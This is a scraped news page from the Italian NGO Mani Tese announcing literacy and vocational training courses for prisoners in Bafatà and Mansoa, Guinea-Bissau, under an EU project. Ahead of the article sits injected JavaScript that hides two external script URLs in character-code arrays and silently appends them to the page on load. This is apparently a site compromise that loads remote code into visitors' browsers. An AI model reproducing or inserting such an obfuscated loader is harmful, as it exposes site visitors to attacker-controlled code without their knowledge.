var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Nelle carceri della Guinea Bissau - Mani TeseMani Tese

← Torna a News

News

Nelle carceri della Guinea Bissau

0

05 ottobre 2015

L’ Unione Europea (delegazione della Guinea Bissau) annuncia l’inizio delle attività di alfabetizzazione e di formazione professionale nei carceri di Bafatà e Mansoa

Il progetto europeo “Il prigioniero ha valore – EIDHR/2014/353-603” promuove il reinserimento sociale e la promozione dei diritti dei prigionieri in Guinea Bissau e offre al 90% dei detenuti presenti nelle strutture carcerarie l’opportunità di beneficiare di 3 livelli di formazione: I livello (alfabetizzazione e cittadinanza), II livello (tecnico- professionale in ambito di agricoltura, allevamento, e artigianato), III livello (gestione di attività generatrici di reddito).

Oggi, 5 ottobre, Mani Tese, in coordinamento con il Ministero della Giustizia della Guinea Bissau e la Direzione Generale dei Servizi Carcerari, inaugurerà a Bafatà e a Mansoa l’avvio dei corsi di alfabetizzazione per i reclusi delle due rispettive prigioni. Questi corsi, cosi come tutte le attività di formazione professionale che saranno realizzate nei due centri di detenzione, sono complementari alle attività di assistenza psico-sociale, funzionale alla ricostruzione di un’identità positiva e proattiva, garantite sempre nell’ambito del presente progetto.

SAMSUNG DIGITAL CAMERA

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

MANITESE OPERA IN 11 PAESI DEL MONDO